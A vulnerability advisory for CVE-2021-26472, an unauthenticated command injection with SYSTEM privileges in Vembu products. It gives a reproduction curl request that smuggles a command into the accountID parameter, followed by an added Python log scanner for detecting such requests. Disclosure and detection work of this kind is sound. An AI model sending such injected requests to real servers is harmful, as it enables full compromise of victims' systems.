CVE-2021-26472 - Unauthenticated remote command execution with SYSTEM privileges in Vembu products
|Page author||Frank Breedijk|
|CVSS Base Score|
On a Windows system, the API located at /consumerweb/secure/download.php allows an attacker to execute arbitrary commands with SYSTEM privileges.
How to reproduce
Step 1: Install a vulnerable product on Windows
Step 2: Execute the following HTTP request
$ curl 'http://local/consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami'
Step 3: Result
This vulnerability allows an attacker to execute arbitrary Windows commands with full SYSTEM privileges, i.e. a full system compromise.
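For defenders reviewing web server logs, the following added example (not part of the original advisory or of Vembu's code) flags requests to the affected endpoint whose decoded accountID is not a plain identifier, such as the `%26` (URL-encoded `&`) in the request above. It assumes a common/combined-format access log and that legitimate accountID values contain only letters, digits, `_` and `-`; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/consumerweb/secure/download.php"
# Assumption: legitimate accountID values are plain identifiers.
SAFE_ACCOUNT_ID = re.compile(r"[A-Za-z0-9_-]+")
# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Feb/2021:10:00:00 +0000] "GET /consumerweb/secure/download.php?Action=ResellerTemplate&accountID=1042 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Feb/2021:10:00:05 +0000] "GET /consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Feb/2021:10:00:09 +0000] "GET /consumerweb/index.php HTTP/1.1" 200 2048',
]


def suspicious_account_ids(log_line):
    """Return decoded accountID values in this line that are not plain identifiers."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # Windows web paths are case-insensitive, so compare in lower case.
    if url.path.lower() != VULN_PATH:
        return []
    # parse_qs splits on the literal '&' first, then percent-decodes each value,
    # so an encoded %26 ends up inside the accountID value where it can be seen.
    params = parse_qs(url.query, keep_blank_values=True)
    values = [v for k, vs in params.items() if k.lower() == "accountid" for v in vs]
    return [v for v in values if not SAFE_ACCOUNT_ID.fullmatch(v)]


def scan(lines):
    """Return (line_number, bad_values) for every line that should be reviewed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        bad = suspicious_account_ids(line)
        if bad:
            hits.append((number, bad))
    return hits


if __name__ == "__main__":
    for number, bad in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious accountID value(s): {bad!r}")
```

A hit indicates a request worth investigating, not proof of compromise; correlate it with process-creation events on the host.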